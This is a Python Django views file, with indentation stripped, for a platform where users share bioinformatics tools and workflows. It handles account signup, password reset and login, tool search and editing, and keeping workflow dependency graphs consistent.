signup_email = kwargs['signup_email'] # https://www.tecmint.com/setup-postfix-mail-server-in-ubuntu-debian/
## Do we allow users with the same email address?
try:
OBC_user.objects.get(user__email = signup_email)
except ObjectDoesNotExist:
pass # This is ok!
else:
# An exception did NOT happen (as it should)
return fail('A user with this email already exists')
## smtplib method
# try:
# send_mail(
# from_=g['EMAIL'],
# to=signup_email,
# subject='[{server}] Please confirm your email'.format(server=g['SERVER']),
# body=confirm_email_body(uuid_token, port=request_port_to_url(request)),
# )
# except smtplib.SMTPRecipientsRefused:
# return fail('Could not sent an email to {}'.format(signup_email))
# except Exception as e:
# pass ## FIXME
## django send_mail
suc, error_message, uuid_token = send_validation_email_inner(request, signup_email)
if not suc:
return fail(error_message)
#Create user
user = User.objects.create_user(signup_username, signup_email, signup_password, last_login=now()) # https://stackoverflow.com/questions/33683619/null-value-in-column-last-login-violates-not-null-constraint/42502311
#Create OBC_user
#If we are running in DEBUG, then new users are validated. If we set this to False then we need a send mail service to testing platform
#In production new users are not validated by default
obc_user = OBC_user(user=user, email_validated=bool(settings.DEBUG), email_validation_token=uuid_token)
obc_user.save()
return success()
@has_data
def reset_password_email(request, **kwargs):
if not 'reset_password_email' in kwargs:
return fail('Please enter an email')
email = kwargs['reset_password_email']
try:
obc_user = OBC_user.objects.get(user__email=email)
except ObjectDoesNotExist:
obc_user = None
if not obc_user:
return fail('This email does not belong to any user') # Isn't this a breach of privacy?
# reset_password_email_body
# Save token
token = create_uuid_token()
obc_user.password_reset_token = token
obc_user.password_reset_timestamp = now()
obc_user.save()
# #Send email with SMTPLIB
# try:
# send_mail(
# from_ = g['EMAIL'],
# to = email,
# subject = '[{server}] Reset your password'.format(server=g['SERVER']),
# body = reset_password_email_body(token, port=request_port_to_url(request))
# )
# except smtplib.SMTPRecipientsRefused:
# return fail('Could not send an email to: {}'.format(email))
# except Exception as e:
# pass # FIX ME
# With Django send_mail
try:
send_mail(
'[{server}] Reset your password'.format(server=g['SERVER']), # subject
reset_password_email_body(token, port=request_port_to_url(request)), # body message
g['EMAIL'], # from
[email], # to
)
except Exception as e:
return fail('Could not send email to {email}. Please contact {ADMIN}'.format(email=email, ADMIN=g['ADMIN']))
return success()
@has_data
def password_reset(request, **kwargs):
if not 'password_reset_password' in kwargs:
return fail('password is required')
password_reset_password = kwargs['password_reset_password']
if not 'password_reset_confirm_password' in kwargs:
return fail('confirm password is required')
password_reset_confirm_password = kwargs['password_reset_confirm_password']
if password_reset_password != password_reset_confirm_password:
return fail('Confirm password does not match password')
check_password_success, check_password_message = check_password(password_reset_password)
if not check_password_success:
return fail(check_password_message)
password_reset_token = kwargs['password_reset_token'] # This should be always present in kwargs
#Change the password
obc_user = OBC_user.objects.get(password_reset_token=password_reset_token)
user = obc_user.user
user.set_password(password_reset_password) # https://docs.djangoproject.com/en/2.1/topics/auth/default/
user.save()
#Invalidate token
obc_user.password_reset_token = None
obc_user.save()
return success()
@has_data
def send_validation_email(request, **kwargs):
'''
url: send_validation_email/
'''
if request.user.is_anonymous:
return fail('Error 8912'); # This should never happen
try:
obc_user = OBC_user.objects.get(user=request.user)
except ObjectDoesNotExist:
return fail('Error 8711'); # This should never happen
email = request.user.email
suc, error_message, uuid_token = send_validation_email_inner(request, email)
if not suc:
return fail(error_message)
#Set the validation token
obc_user.email_validation_token = uuid_token
obc_user.save()
#print ('Validation token:', uuid_token)
ret = {
'email': request.user.email
}
return success(ret)
@has_data
def login(request, **kwargs):
'''
View url: 'login/'
'''
if not 'login_username' in kwargs:
return fail('username is required')
login_username = kwargs['login_username']
if not 'login_password' in kwargs:
return fail('password is required')
login_password = kwargs['login_password']
user = authenticate(username=login_username, password=login_password)
if user is None:
return fail('Invalid username or password')
django_login(request, user)
obc_user = OBC_user.objects.get(user=user)
#print ('LOGIN: user_is_validated', obc_user.email_validated)
# Since we logged in the csrf token has changed.
ret = {
'username': login_username,
'csrf_token': get_token(request),
'user_is_validated': obc_user.email_validated,
'profile_clients': get_execution_clients_angular(request),
}
return success(ret)
def logout(request):
'''
View url: 'logout/'
This is NOT called by AJAX
'''
django_logout(request)
return redirect('/platform/')
#def user_data_get(request):
# '''
# View url: user_data_get
# GET THE DATA OF THE LOGGED-IN USER
# It does not have the @has_data decorator because it has.. no data
# '''
#
# user = request.user
# obc_user = OBC_user.objects.get(user=user)
# ret = {
# 'user_first_name': obc_user.first_name,
# 'user_last_name': obc_user.last_name,
# 'user_email': user.email,
# 'user_website': obc_user.website,
# 'user_public_info': obc_user.public_info,
# }
#
# return success(ret)
#@has_data
#def user_data_set(request, **kwargs):
# '''
# Deprecated
# '''
# user = request.user
# obc_user = OBC_user.objects.get(user=user)
#
# obc_user.first_name = None_if_empty_or_nonexisting(kwargs, 'user_first_name')
# obc_user.last_name = None_if_empty_or_nonexisting(kwargs, 'user_last_name')
# obc_user.website = None_if_empty_or_nonexisting(kwargs, 'user_website')
# obc_user.public_info = None_if_empty_or_nonexisting(kwargs, 'user_public_info')
#
# obc_user.save()
#
# return success()
@has_data
def tools_search_1(request, **kwargs):
'''
Get tool counts
NOT CURRENTLY USED!
'''
queries = []
ret = {
'tools_search_tools_number': Tool.objects.count(),
'workflows_search_tools_number': Workflow.objects.count(),
}
return success(ret)
def tools_search_2(tools_search_name, tools_search_version, tools_search_edit):
'''
This is triggered when there is a key-change on the main-search
'''
Qs = []
if tools_search_name:
Q1 = Q(name__icontains=tools_search_name)
Q2 = Q(obc_user__user__username__icontains=tools_search_name)
Qs.append(Q1 | Q2)
if tools_search_version:
Qs.append(Q(version__icontains=tools_search_version))
if tools_search_edit:
Qs.append(Q(edit = int(tools_search_edit)))
# This applies an AND operator. https://docs.djangoproject.com/en/2.2/topics/db/queries/#complex-lookups-with-q-objects
# For the order_by part see issue #120
results = Tool.objects.filter(*Qs).order_by('created_at')
# { id : 'ajson1', parent : '#', text : 'KARAPIPERIM', state: { opened: true} }
# Build JS TREE structure
tools_search_jstree = []
for x in results:
to_add = {
'data': {'name': x.name, 'version': x.version, 'edit': x.edit},
'text': tool_node_jstree(x), # tool_text_jstree(x) + (' <span class="red lighten-3">DRAFT</span>' if x.draft else '') + jstree_icon_html('tools'),
'id': tool_id_jstree(x, g['SEARCH_TOOL_TREE_ID']),
'parent': tool_id_jstree(x.forked_from, g['SEARCH_TOOL_TREE_ID']) if x.forked_from else '#',
'state': { 'opened': True},
}
tools_search_jstree.append(to_add)
ret = {
'tools_search_tools_number' : results.count(),
#'tools_search_list': [{'name': x.name, 'version': x.version, 'edit': x.edit} for x in results], # We do not need a list, we need a tree!
'tools_search_jstree' : tools_search_jstree,
}
return ret
def workflows_search_2(workflows_search_name, workflows_search_edit):
'''
Called by all_search_2
'''
Qs = []
#workflows_search_name = kwargs.get('workflows_search_name', '')
if workflows_search_name:
Q1 = Q(name__icontains=workflows_search_name)
Q2 = Q(obc_user__user__username__icontains=workflows_search_name)
Qs.append(Q1 | Q2)
#workflows_search_edit = kwargs.get('workflows_search_edit', '')
if workflows_search_edit:
Qs.append(Q(edit = int(workflows_search_edit)))
# For the order_by part see issue #120
results = Workflow.objects.filter(*Qs).order_by('created_at')
# Build JS TREE structure
workflows_search_jstree = []
for x in results:
to_add = {
'data': {'name': x.name, 'edit': x.edit},
'text': workflow_node_jstree(x),
'id': workflow_id_jstree(x, g['SEARCH_WORKFLOW_TREE_ID']),
'parent': workflow_id_jstree(x.forked_from, g['SEARCH_WORKFLOW_TREE_ID']) if x.forked_from else '#',
'state': { 'opened': True},
}
workflows_search_jstree.append(to_add)
ret = {
'workflows_search_tools_number' : results.count(),
'workflows_search_jstree' : workflows_search_jstree,
}
return ret
@has_data
def tools_search_3(request, **kwargs):
'''
Triggered when a tool is clicked on the tool-search-jstree
'''
tool_name = kwargs.get('tool_name', '')
tool_version = kwargs.get('tool_version', '')
tool_edit = int(kwargs.get('tool_edit', -1))
tool = Tool.objects.get(name__iexact=tool_name, version__iexact=tool_version, edit=tool_edit)
#Get the dependencies of this tool and build a JSTREE
tool_dependencies_jstree = []
for dependency in tool.dependencies.all():
dependency_js_tree = tool_build_dependencies_jstree(tool_get_dependencies_internal(dependency, include_as_root=True))
tool_dependencies_jstree.extend(dependency_js_tree)
#Get the dependencies of this tool AND the variables and build a JSTREE
#FIXME: Duplicate code
tool_variables_jstree = []
for dependency in tool.dependencies.all():
variables_js_tree = tool_build_dependencies_jstree(tool_get_dependencies_internal(dependency, include_as_root=True), add_variables=True)
tool_variables_jstree.extend(variables_js_tree)
#print ('LOGGG DEPENDENIES + VARIABLES')
#print (tool_variables_jstree)
#print (simplejson.dumps(tool_variables_jstree, indent=4))
#Get the variables of this tool
tool_variables = []
for variable in tool.variables.all():
tool_variables.append({'name': variable.name, 'value': variable.value, 'description': variable.description})
# Get obc_user
if request.user.is_anonymous:
obc_user = None
else:
obc_user = OBC_user.objects.get(user=request.user)
#Is it voted?
if obc_user:
try:
v = UpDownToolVote.objects.get(obc_user=obc_user, tool=tool)
except ObjectDoesNotExist as e:
# It is not voted
tool_voted = {'up': False, 'down': False}
else:
# It is noted
tool_voted = {'up': v.upvote, 'down': not v.upvote}
else:
tool_voted = {'up': False, 'down': False}
ret = {
'website': tool.website,
'description': tool.description,
'description_html': tool.description_html,
'username': tool.obc_user.user.username,
'created_at': datetime_to_str(tool.created_at),
'forked_from': tool_to_json(tool.forked_from),
'changes': tool.changes,
'tool_keywords': [keyword.keyword for keyword in tool.keywords.all()],
'dependencies_jstree': tool_dependencies_jstree,
'variables_js_tree': tool_variables_jstree,
'variables': tool_variables,
'tool_os_choices': OS_types.get_angular_model([x.os_choices for x in tool.os_choices.all()]),
'installation_commands': tool.installation_commands,
'validation_commands': tool.validation_commands,
'validation_status': tool.last_validation.validation_status if tool.last_validation else 'Unvalidated',
# Show stdout, stderr and error code when the tool is clicked on the tool-search-jstree
'stdout' : tool.last_validation.stdout if tool.last_validation else None,
'stderr' : tool.last_validation.stderr if tool.last_validation else None,
'errcode' : tool.last_validation.errcode if tool.last_validation else None,
'validation_created_at' : datetime_to_str(tool.last_validation.created_at) if tool.last_validation else None,
'tool_pk': tool.pk, # Used in comments
'tool_thread': qa_create_thread(tool.comment, obc_user), # Tool comment thread. This is a list
'tool_score': tool.upvotes - tool.downvotes,
'tool_voted': tool_voted,
'tool_comment_id': tool.comment.pk, # Used to create a permalink to the comments
'tool_comment_title': tool.comment.title,
'tool_comment_created_at': datetime_to_str(tool.comment.created_at),
'tool_comment_username': tool.comment.obc_user.user.username,
'draft': tool.draft,
}
#print ('LOGGG DEPENDENCIES + VARIABLES')
#print (simplejson.dumps(tool_variables_jstree, indent=4))
return success(ret)
@has_data
def tool_get_dependencies(request, **kwargs):
'''
Get the dependencies of this tool
Called when a stop event (from dnd) happens from search JSTREE to the dependencies JSTREE
OR from a stop event from search jstree to cytoscape graph
what_to_do == 1: drag and drop FROM SEARCH TREE TO DEPENDENCY TREE
what_to_do == 2: dran and drop FROM SEARCH TREE TO CYTOSCAPE CYWORKFLOW DIV
'''
tool_name = kwargs.get('tool_name', '')
tool_version = kwargs.get('tool_version', '')
tool_edit = int(kwargs.get('tool_edit', -1))
what_to_do = kwargs.get('what_to_do', None)
if not what_to_do:
return fail('Error 9122')
try:
what_to_do = int(what_to_do)
except ValueError as e:
return fail('Error 9123')
tool = Tool.objects.get(name=tool_name, version=tool_version, edit=tool_edit)
#Get the dependencies of this tool
tool_dependencies = tool_get_dependencies_internal(tool, include_as_root=True)
tool_dependencies_jstree = tool_build_dependencies_jstree(tool_dependencies, add_installation_commands=what_to_do==2)
#Get the dependencies + variables of this tool
tool_variables_jstree = tool_build_dependencies_jstree(tool_dependencies, add_variables=True)
#print ('LOGGG DEPENDENCIES')
#print (simplejson.dumps(tool_dependencies_jstree, indent=4))
#print ('LOGGG DEPENDENCIES + VARIABLES')
#print (simplejson.dumps(tool_variables_jstree, indent=4))
# There is $scope.tools_dep_jstree_model and $scope.tools_var_jstree_model
ret = {
'dependencies_jstree': tool_dependencies_jstree,
'variables_jstree': tool_variables_jstree,
}
return success(ret)
def validate_toast_button():
'''
This button should be similar with the one generated from angular
'''
return '<button class="waves-effect waves-light btn red lighten-3 black-text" onclick="window.OBCUI.send_validation_mail()">Validate</button>'
@has_data
def tools_add(request, **kwargs):
'''
Add a new tool
tool add tool save tool . Create tool
* names and version is searched case insensitive
'''
if request.user.is_anonymous: # Server should always check..
return fail('Please login to create new tools')
if not user_is_validated(request):
return fail('Please validate your email to create new tools ' + validate_toast_button())
obc_user = OBC_user.objects.get(user=request.user)
tool_website = kwargs.get('tool_website', '')
#if not tool_website:
# return fail('Website cannot be empty') # Website CAN be empty
if tool_website:
if not valid_url(tool_website):
return fail('Website is not a valid URL')
tool_description = kwargs.get('tool_description', '')
if not tool_description:
return fail('Description cannot be empty')
tool_description_html = markdown(tool_description)
tools_search_name = kwargs.get('tools_search_name', '')
if not tools_search_name:
return fail('Invalid name')
tools_search_version = kwargs.get('tools_search_version', '')
if not tools_search_version:
return fail('Invalid version')
tool_edit_state = kwargs.get('tool_edit_state', '')
if not type(tool_edit_state) is bool:
return fail('Error 8715')
upvoted = False
downvoted = False
tool_forked_from = None
tool_changes = None
if tool_edit_state:
# We are editing this tool!
# Get the edit of the tool
tools_search_edit = kwargs.get('tools_search_edit', '')
if not tools_search_edit:
return fail('Invalid tool edit number. Error 8712')
try:
tools_search_edit = int(tools_search_edit)
except ValueError as e:
return fail('Invalid tool edit number. Error 8713')
except Exception as e:
return fail('Invalid tool edit number. Error 8714')
# Delete the previous object!
try:
tool = Tool.objects.get(name=tools_search_name, version=tools_search_version, edit=tools_search_edit)
except ObjectDoesNotExist as e:
return fail('Error 8716')
# Check that the user who created this tool is the one who deletes it!
if tool.obc_user != obc_user:
return fail('Error 8717') # This is strange.. The user who edits this tool is not the one who created it???
# Store a reference to the comment
comment = tool.comment
# Store upvotes/downvotes
upvotes = tool.upvotes
downvotes = tool.downvotes
# Store vote objects
votes = UpDownToolVote.objects.filter(tool=tool)
# Disassociate from this tool (this is allowed because null=true)
for vote in votes:
if vote.obc_user == obc_user:
upvoted = vote.upvote
downvoted = not upvoted
vote.tool = None
vote.save()
# Get the tools that are forks of this tool
tool_forks = Tool.objects.filter(forked_from=tool)
# Temporary set that these tools are not forked from any tool
for tool_fork in tool_forks:
tool_fork.forked_from = None
tool_fork.save()
# Get the tool that this tool is forked from
tool_forked_from = tool.forked_from
# Get the tools that depend from this tool
tools_depending_from_me = tool.dependencies_related.all()
tools_depending_from_me_list = list(tools_depending_from_me) # We need to add a reference to these object. Otherwise it will be cleared after we delete tool
# Get the created at. It needs to be sorted according to this, otherwise the jstree becomes messy
tool_created_at = tool.created_at
# Get the workflows that use this tool
workflows_using_this_tool = Workflow.objects.filter(tools__in = [tool])
# Remove this tool from these workflows
for workflow_using_this_tool in workflows_using_this_tool:
workflow_using_this_tool.tools.remove(tool)
workflow_using_this_tool.save()
# Delete it!
tool.delete()
else:
upvotes = 0
downvotes = 0
#os_type Update
tool_os_choices = kwargs.get('tool_os_choices',[])
if not tool_os_choices:
return fail('Please select at least one operating system')
#print ('Operating Systems:')
#print (tool_os_choices)
# If we are editing this tool, set the same edit number
# Otherwise get the maximum edit
if tool_edit_state:
next_edit = tools_search_edit
else:
#Get the maximum edit
tool_all = Tool.objects.filter(name__iexact=tools_search_name, version__iexact=tools_search_version) # https://docs.djangoproject.com/en/dev/ref/models/querysets/#std:fieldlookup-iexact
if not tool_all.exists():
next_edit = 1
else:
max_edit = tool_all.aggregate(Max('edit'))
next_edit = max_edit['edit__max'] + 1
# Get forked from and edit summary
tool_forked_from_info = kwargs.get('tool_forked_from', None)
if tool_forked_from_info:
tool_forked_from = Tool.objects.get(name=tool_forked_from_info['name'], version=tool_forked_from_info['version'], edit=int(tool_forked_from_info['edit']))
tool_changes = kwargs.get('tool_changes', '')
if not tool_changes:
return fail('Edit summary cannot be empty')
else:
pass # Do nothing
#Installation/Validation commands
tool_installation_commands = kwargs['tool_installation_commands']
tool_validation_commands = kwargs['tool_validation_commands']
#Dependencies
tool_dependencies = kwargs['tool_dependencies']
# FIXME! What if a dependency is deleted???
tool_dependencies_objects = [Tool.objects.get(name=t['name'], version=t['version'], edit=int(t['edit'])) for t in tool_dependencies]
#Variables
tool_variables = kwargs['tool_variables']
tool_variables = [x for x in tool_variables if x['name'] and x['value'] and x['description']] # Filter out empty fields
# Check that variables do not have the same name
for variable_name, variable_name_counter in Counter([x['name'] for x in tool_variables]).items():
if variable_name_counter>1:
return fail('Two variables cannot have the same name!')
#Create new tool
new_tool = Tool(
obc_user= obc_user,
name = tools_search_name,
version=tools_search_version,
edit=next_edit,
website = tool_website,
description = tool_description,
description_html = tool_description_html,
forked_from = tool_forked_from,
changes = tool_changes,
installation_commands=tool_installation_commands,
validation_commands=tool_validation_commands,
upvotes = upvotes,
downvotes = downvotes,
draft = True, # By defaut all new tools are draft
last_validation=None,
)
#Save it
new_tool.save()
if tool_edit_state:
# Preserve the created at date. We have to do that AFTER the save! https://stackoverflow.com/questions/7499767/temporarily-disable-auto-now-auto-now-add
# If we do not preserve the created at, then the jstree becomes messy.
new_tool.created_at = tool_created_at
new_tool.save()
#Add dependencies
if tool_dependencies_objects:
new_tool.dependencies.add(*tool_dependencies_objects)
new_tool.save()
#Add Variables
if tool_variables:
variable_objects = []
for variable in tool_variables:
variable_object = Variables(name=variable['name'], value=variable['value'], description=variable['description'], tool=new_tool)
variable_object.save()
variable_objects.append(variable_object)
new_tool.variables.add(*variable_objects)
new_tool.save()
#Add os type
for tool_os_choice in tool_os_choices:
OS_types_obj, created = OS_types.objects.get_or_create(os_choices=tool_os_choice['value'])
new_tool.os_choices.add(OS_types_obj)
new_tool.save()
#Add keywords
keywords = [Keyword.objects.get_or_create(keyword=keyword)[0] for keyword in kwargs['tool_keywords']]
new_tool.keywords.add(*keywords)
new_tool.save()
if tool_edit_state:
# Add the votes from the previous edit
for vote in votes:
vote.tool = new_tool
vote.save()
# Add the tools that were forked from this tool (that was deleted before) to the new tool
for tool_fork in tool_forks:
tool_fork.forked_from = new_tool
tool_fork.save()
# To the tools depending from me, add this tool to dependencies!
for tool_depending_from_me in tools_depending_from_me_list:
tool_depending_from_me.dependencies.add(new_tool)
#print ('Add {} as a dependency to {}'.format(new_tool, tool_depending_from_me))
tool_depending_from_me.save()
# Add to the workflows that were using this tool, the new tool
for workflow_using_this_tool in workflows_using_this_tool:
workflow_using_this_tool.tools.add(new_tool)
workflow_using_this_tool.save()
# Update the json graph of the workflows using this tool
WJ = WorkflowJSON()
WJ.update_tool(new_tool)
else:
#Add an empty comment. This will be the root comment for the QA thread
comment = Comment(
obc_user = OBC_user.objects.get(user=request.user),
comment = '',
comment_html = '',
title = markdown('Discussion on Tool: t/{}/{}/{}'.format(tools_search_name, tools_search_version, next_edit)),
parent = None,
upvotes = 0,
downvotes = 0,
)
comment.save()
new_tool.comment = comment
new_tool.save()
ret = {
'description_html': tool_description_html,
'edit': next_edit,
'created_at': datetime_to_str(new_tool.created_at),
'tool_pk': new_tool.pk, # Used in comments
'tool_thread': qa_create_thread(new_tool.comment, obc_user), # Tool comment thread
'score': upvotes-downvotes,
'voted': {'up': upvoted, 'down': downvoted},
}
return success(ret)
class WorkflowJSON:
'''
Basically a function collection for dealing with the workflow json object
'''
def update_workflow(self, workflow):
'''
workflow is a database Workflow opbject
'''
self.workflow = workflow
self.key = workflow_id_cytoscape(self.workflow, None, None)
self.graph = simplejson.loads(self.workflow.workflow)
self.all_ids = {node['data']['id'] for node in self.graph['elements']['nodes']} # All node ids
self.workflows_using_me = Workflow.objects.filter(workflows__in = [self.workflow])
self.belongto, self.workflow_nodes = self.__build_workflow_belongto(self.graph)
self.__update_workflow()
def update_tool(self, tool):
'''
tool is a database Tool object
'''
self.tool = tool
self.graph = self.__create_cytoscape_graph_from_tool_dependencies(self.tool)
self.all_ids = {node['data']['id'] for node in self.graph['elements']['nodes']} # All node ids
self.workflows_using_me = Workflow.objects.filter(tools__in = [self.tool])
self.key = tool_id_cytoscape(self.tool)
self.__update_tool()
def __iter_workflows(self, graph):
'''
'''
for element in graph['elements']['nodes']:
if element['data']['type'] == 'workflow':
yield element
def __build_workflow_belongto(self, graph):
'''
Create dictionaries:
self.belongto
Keys: workflow tuple (name, edit)
Value: The workflow element where this workflow belongs to
self.workflow_nodes
Keys: workflow tuple
Value: The workflow element
'''
all_workflows = list(self.__iter_workflows(graph))
workflow_nodes = {workflow_element['data']['id'] : workflow_element for workflow_element in all_workflows}
belongto = {}
for workflow_element in all_workflows:
workflow_key = workflow_element['data']['id']
if workflow_element['data']['belongto']:
belongto[workflow_key] = workflow_nodes[workflow_id_cytoscape(workflow_element['data']['belongto'], None, None)]
else:
belongto[workflow_key] = None
return belongto, workflow_nodes
def __build_edges_dict(self, graph):
'''
Create a dictionary 's': source, 't': target
Keys are node ids
Values are a set containing all the nodes that there is an edge
'''
ret = {
's' : defaultdict(set),
't' : defaultdict(set),
}
for edge in graph['elements']['edges']:
ret['s'][edge['data']['source']].add(edge['data']['target'])
ret['t'][edge['data']['target']].add(edge['data']['source'])
return ret
def __tool_dependencies(self, tool_node, all_nodes, edges):
'''
Edge A --> B: Tool A has dependency B . Or else, A depends from B. Or else first install B then A
Return a set of all tool ids that belong to the dependencies of a tool (tool_node)
tool_node: The tool node in a workflow cy
all_nodes: A list of all nodes of a workflow cy
edges: The object returned from self.__build_edges_dict
'''
ret = set()
#print ('tool_node:', tool_node)
#print ('Edge set:', edges)
def recurse(rec_tool_node):
tool_id = rec_tool_node['data']['id']
for target_id in edges['s'][tool_id]:
target_node = all_nodes[target_id]
if not target_node['data']['type'] == 'tool':
continue
# This is a tool. There exist an edge rec_tool_node --> target_node. This means that rec_tool_node dependes from target_node
if not target_id in ret:
ret.add(target_id)
recurse(target_node)
#print ('set 2:', ret)
recurse(tool_node)
ret.add(tool_node['data']['id'])
return ret
def __create_cytoscape_graph_from_tool_dependencies(self, tool):
'''
tool is a database object.
Return a workflow cytoscape worflow. It does not contain the workflow node!
tool_depending_from_me=None
'''
all_ids = set()
workflow = {
'elements': {
'nodes': [],
'edges': [],
}
}
this_tool_cytoscape_node = tool_node_cytoscape(tool)
workflow['elements']['nodes'].append(this_tool_cytoscape_node)
# FIXME !!! DUPLICATE CODE
root_tool_all_dependencies = tool_get_dependencies_internal(tool, include_as_root=False)
for root_tool_all_dependency in root_tool_all_dependencies:
# For each dependency create a cytoscape node
cytoscape_node = tool_node_cytoscape(root_tool_all_dependency['dependency'], tool_depending_from_me=root_tool_all_dependency['dependant'])
if not cytoscape_node['data']['id'] in all_ids: # An id should exist only once in the graph... FIXME!! all_ids is always empty!
workflow['elements']['nodes'].append(cytoscape_node)
# Connect this tool with its dependent tool node
if root_tool_all_dependency['dependant']:
workflow['elements']['edges'].append(edge_cytoscape(tool_node_cytoscape(root_tool_all_dependency['dependant']), cytoscape_node))
else:
# This tool does not have a dependant!
# This is a dependency of the root tool!
workflow['elements']['edges'].append(edge_cytoscape(this_tool_cytoscape_node, cytoscape_node))
return workflow
def __node_belongs_to_a_workflow(self, node, workflow, workflow_nodes):
'''
Recursive
'''
if not node: # We are running this for ALL workflow nodes. Including the root workflow that its belongto to is None
return False
# We reached the root
if not node['data']['belongto']:
return False
workflow_key = workflow['data']['id']
node_belongto_key = workflow_id_cytoscape(node['data']['belongto'], None, None)
#print ('Checking: {} == {}'.format(workflow_key, node_belongto_key))
if workflow_key == node_belongto_key:
return True
# This node does not belong to this workflow. Perhaps the node-->belongto workflow belongs to this workflow
return self.__node_belongs_to_a_workflow(workflow_nodes[node_belongto_key], workflow, workflow_nodes)
def __nodes_belonging_to_a_workflow(self, graph, workflow_node, workflow_nodes):
'''
Returns a set
'''
ret = {element['data']['id'] for element in graph['elements']['nodes']
if self.__node_belongs_to_a_workflow(element, workflow_node, workflow_nodes)}
ret.add(workflow_node['data']['id']) # Add the workflow node as well
return ret
def __remove_nodes_edges(self, graph, node_ids_to_remove, node_ids_to_add):
'''
CRITICAL: A mistake here could produce a corrupted graph..
'''
# Determine which edges should be removed
edge_ids_to_remove = set()
for edge in graph['elements']['edges']:
source_id = edge['data']['source']
target_id = edge['data']['target']
edge_id = edge['data']['id']
source_id_in = source_id in node_ids_to_remove
target_id_in = target_id in node_ids_to_remove
# This is an edge from inside to inside. Remove it
if source_id_in and target_id_in:
edge_ids_to_remove.add(edge_id)
continue
# This is an edge from inside to outside
# Also, on the new workflow, the inside node does not exist!
# Se we are removing the edge. This might render the workflow useless, but not corrupted!
if source_id_in and not target_id_in:
if not source_id in node_ids_to_add:
edge_ids_to_remove.add(edge_id)
continue
# Same as before but the edge is from outside to inside
if not source_id_in and target_id_in:
if not target_id in node_ids_to_add:
edge_ids_to_remove.add(edge_id)
# Remove edges
graph['elements']['edges'] = [edge for edge in graph['elements']['edges'] if not edge['data']['id'] in edge_ids_to_remove]
# Remove nodes
graph['elements']['nodes'] = [node for node in graph['elements']['nodes'] if not node['data']['id'] in node_ids_to_remove]
def __consistency_check_graph_model(self, graph, workflow):
'''
Whenever we update the graph of a workflow, we have to make sure that all tools/workflows that this graph has, do exist in the model
We also need to check the opposite: All tools/workflows that exist in the model also exist in the graph
'''
workflow_using_me_tools = workflow.tools.all()
tools_found = {str(t): [False, t] for t in workflow_using_me_tools}
workflow_using_me_workflow = workflow.workflows.all()
workflows_found = {str(w): [False, w] for w in workflow_using_me_workflow}
for node in graph['elements']['nodes']:
if node['data']['type'] == 'tool':
if node['data']['disconnected']:
continue
# This is a tool does it exist in the model?
this_tool = Tool.objects.get(name=node['data']['name'], version=node['data']['version'], edit=node['data']['edit'])
if not workflow_using_me_tools.filter(pk=this_tool.pk).exists():
# This tools does not exist in the model but exists on the graph. Add it!
workflow.tools.add(this_tool)
else:
tools_found[str(this_tool)][0] = True
if node['data']['type'] == 'workflow':
if node['data']['disconnected']:
continue
if not node['data']['belongto']:
continue # Do not connect the root workflow
this_workflow = Workflow.objects.get(name=node['data']['name'], edit=node['data']['edit'])
if not workflow_using_me_workflow.filter(pk=this_workflow.pk).exists():
# This workflow does not exist in the model but exists on the graph. Add it!
workflow.workflows.add(this_workflow)
else:
workflows_found[str(this_workflow)][0] = True
workflow.save()
# Is there any tool that exist on the model, but it does not exist on the graph?
for tool_id, (exists, this_tool) in tools_found.items():
if not exists:
# This tool exists on the model but not in the graph. REMOVE IT!
workflow.tools.remove(this_tool)
# Is there any workflow that exists on the model, but it does not exist on the graph?
for workflow_id, (exists, this_workflow) in workflows_found.items():
if not exists:
# Remove this workflow from the model
workflow.workflows.remove(this_workflow)
workflow.save()
def __update_workflow_node(self, workflow_node, workflow_object):
'''
Update a workflow node according to the data from the workflow_object
'''
workflow_node['data']['draft'] = workflow_object.draft
def __update_workflow(self,):
'''
update this workflow
'''
self.__update_workflow_node(self.workflow_nodes[self.key], self.workflow)
self.workflow.workflow = simplejson.dumps(self.graph)
self.workflow.save()
# Update also the workflows that are using me
for workflow_using_me in self.workflows_using_me:
#print ('workflow using me:', workflow_using_me)
graph = simplejson.loads(workflow_using_me.workflow)
belongto, workflow_nodes = self.__build_workflow_belongto(graph)
# Get the workflow that the workflow that we want to update belongs to
belongto_root = belongto[self.key]
#print (' belongto_root: ', belongto_root)
# Get the workflow node that we want to update
workflow_node_root = workflow_nodes[self.key]
#print (' Workflow node root:', workflow_node_root)
# This is a set of all the nodes that this sub-workflow has
workflow_nodes_set = self.__nodes_belonging_to_a_workflow(graph, workflow_node_root, workflow_nodes)
#print (' workflow nodes set:', workflow_nodes_set)
# Remove these nodes (and edges connected to them) from the graph
self.__remove_nodes_edges(graph, workflow_nodes_set, self.all_ids)
#print ('The graph after removing of nodes edges:')
#print (simplejson.dumps(graph, indent=4))
# Add the edges of this graph
graph['elements']['edges'].extend(self.graph['elements']['edges'])
# Add the nodes of this graph
# Make sure that any main step becomes sub_main
nodes_to_add = self.graph['elements']['nodes']
for node in nodes_to_add:
if node['data']['type'] == 'step':
if node['data']['main']:
node['data']['main'] = False
node['data']['sub_main'] = True
graph['elements']['nodes'].extend(nodes_to_add)
# Update the belongto info on the root workflow node. We cannot use the belongto and workflow_nodes any more
workflow_node_root = [node for node in graph['elements']['nodes'] if node['data']['id'] == self.key][0]
workflow_node_root['data']['belongto'] = {'name': belongto_root['data']['name'] , 'edit': belongto_root['data']['edit']}
# Update the root workflow node
self.__update_workflow_node(workflow_node_root, self.workflow)
# Save the graph
workflow_using_me.workflow = simplejson.dumps(graph)
workflow_using_me.save()
# Check graph <--> model consistency
self.__consistency_check_graph_model(graph, workflow_using_me)
def __update_tool(self,):
'''
'''
# Update all the workflows who are using this tool
for workflow_using_me in self.workflows_using_me:
#print ('The graph of this tool:')
#print (simplejson.dumps(self.graph, indent=4))
#print ('Workflow using me:', workflow_using_me.name, workflow_using_me.edit)
graph = simplejson.loads(workflow_using_me.workflow)
#print (' The workflow graph:')
#print (simplejson.dumps(graph, indent=4))
all_nodes = {node['data']['id']:node for node in graph['elements']['nodes']}
belongto = {node['data']['id']: node['data']['belongto'] for node in graph['elements']['nodes']}
edges = self.__build_edges_dict(graph)
#print (' All nodes:')
#print (simplejson.dumps(all_nodes, indent=4))
#print (' Belongto:')
#print (simplejson.dumps(belongto, indent=4))
#print (' self.key:', self.key)
tool_node = all_nodes[self.key]
tool_node_belongto = belongto[self.key]
# Use download_tool() does the same task. The problem is that it works directly with the UI.
# We want to construct a cytoscape graph from the database object
# Get a set of the node ids that depend from this tool
tool_dependencies = self.__tool_dependencies(tool_node, all_nodes, edges)
#print (' Nodes to delete:')
#print (tool_dependencies)
# Remove these nodes (and edges connected to them) from the graph
self.__remove_nodes_edges(graph, tool_dependencies, self.all_ids)
